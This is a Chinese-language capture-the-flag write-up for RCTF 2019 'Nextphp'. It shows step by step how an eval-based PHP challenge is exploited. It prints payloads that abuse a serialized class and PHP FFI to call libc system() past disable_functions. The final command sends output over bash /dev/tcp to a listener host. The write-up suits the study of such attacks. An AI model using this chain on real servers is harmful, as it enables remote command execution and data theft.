[RCTF 2019]Nextphp-解题步骤详解

2022年5月24日00:50:26评论79 views字数 2951阅读9分50秒阅读模式

<?phpif (isset($_GET['a'])) {    eval($_GET['a']);} else {    show_source(__FILE__);}

尝试利用eval

?a=echo system("ls");

[RCTF 2019]Nextphp-解题步骤详解

system()函数被禁止了.

尝试查看phpinfo();

?a=phpinfo();

查看成功,在页面查找disable_functions来查看都有哪些函数被禁用了:

在这里插入图片描述

[RCTF 2019]Nextphp-解题步骤详解

接下来使用其中没有过滤的函数进行渗透:

?a=echo var_dump(scandir("/var/www/html/"));

返回结果如下:

 array(4) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(9) "index.php" [3]=> string(11) "preload.php" }

查看preload.php的内容:

?a=echo%20file_get_contents("preload.php");

得到如下代码:

<?phpfinal class A implements Serializable {    protected $data = [        'ret' => null,        'func' => 'print_r',        'arg' => '1'    ];    private function run () {        $this->data['ret'] = $this->data['func']($this->data['arg']);    }    public function __serialize(): array {        return $this->data;    }    public function __unserialize(array $data) {        array_merge($this->data, $data);        $this->run();    }    public function serialize (): string {        return serialize($this->data);    }    public function unserialize($payload) {        $this->data = unserialize($payload);        $this->run();    }    public function __get ($key) {        return $this->data[$key];    }    public function __set ($key, $value) {        throw new Exception('No implemented');    }    public function __construct () {        throw new Exception('No implemented');    }}

利用下面的脚本生成一个序列化对象:

<?phpfinal class A implements Serializable {    protected $data = [        'ret' => null,        'func' => 'print_r',        'arg' => '666'    ];    private function run () {        $this->data['ret'] = $this->data['func']($this->data['arg']);    }    public function __serialize(): array {        return $this->data;    }    public function __unserialize(array $data) {        array_merge($this->data, $data);        $this->run();    }    public function serialize (): string {        return serialize($this->data);    }    public function unserialize($payload) {        $this->data = unserialize($payload);        $this->run();    }    public function __get ($key) {        return $this->data[$key];    }    public function __set ($key, $value) {            }    public function __construct () {           }}$A = new A();var_dump(serialize($A))?>

string(76) "C:1:"A":63:{a:3:{s:3:"ret";N;s:4:"func";s:7:"print_r";s:3:"arg";s:3:"666";}}"

传参:

?a=include(%27preload.php%27);var_dump(unserialize(%27C:1:"A":63:{a:3:{s:3:"ret";N;s:4:"func";s:7:"print_r";s:3:"arg";s:3:"666";}}%27)->__get("ret"));

返回结果如下:

[RCTF 2019]Nextphp-解题步骤详解

成功用函数print_r打印出666

然后emmm,实在是想不出来改怎么利用,system,exec这些函数都被禁用了,于是看了看队里之前的wp:

发现一个叫做FFI的拓展

<?php// create FFI object, loading libc and exporting function printf()$ffi = FFI::cdef(    "int printf(const char *format, ...);", // this is regular C declaration    "libc.so.6");// call C printf()$ffi->printf("Hello %s!n", "world");

那就修改一下之前生成payload的脚本:

?a=include(%27preload.php%27);unserialize(%27C:1:%22A%22:89:{a:3:{s:3:%22ret%22;N;s:4:%22func%22;s:9:%22FFI::cdef%22;s:3:%22arg%22;s:26:%22int%20system(char%20*command);%22;}}%27)-%3E__get(%22ret%22)-%3Esystem(%27bash%20-c%20%22ls%20%3E%20/dev/tcp/监听主机ip/8080%22%27);发现flag,接下来把命令改成cat /flag即可